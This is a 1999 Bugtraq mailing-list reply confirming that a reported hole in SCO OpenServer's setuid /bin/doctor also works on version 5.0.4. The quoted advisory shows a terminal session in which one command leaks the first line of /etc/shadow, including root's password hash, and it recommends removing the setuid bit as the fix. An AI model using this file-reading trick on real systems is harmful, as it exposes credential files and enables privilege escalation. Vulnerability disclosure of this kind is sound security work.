[11804] in bugtraq
Re: SCO 5.0.5 /bin/doctor local root comprimise
daemon@ATHENA.MIT.EDU (Seth R Arnold)
Fri Sep 10 00:33:03 1999
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990908113157.J7981@willamette.edu>
Date: Wed, 8 Sep 1999 11:31:57 -0700
Reply-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
From: Seth R Arnold <sarnold@WILLAMETTE.EDU>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <041201bef65a$80544b10$3177a8c0@webley>; from Brock Tellier on
Fri, Sep 03, 1999 at 05:20:17PM -0500
confirmed to run under 5.0.4 as well.
On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
> Greetings,
>
>
> INFO:
> There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example:
>
> scobox:/bin$ id
> uid=136(btellier),200(users)
> scobox:/bin$ uname -a
> SCO_SV scobox 3.2 5.0.5 i386
> scobox:/bin$ doctor -V
> doctor 2.0.0e 2
> scobox:/bin$ doctor -s /etc/shadow
> doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
> scobox:/bin$
>
> And so on.
>
> FIX:
> Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within.
>
> Brock Tellier
> Systems Administrator
> Webley Systems
--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!
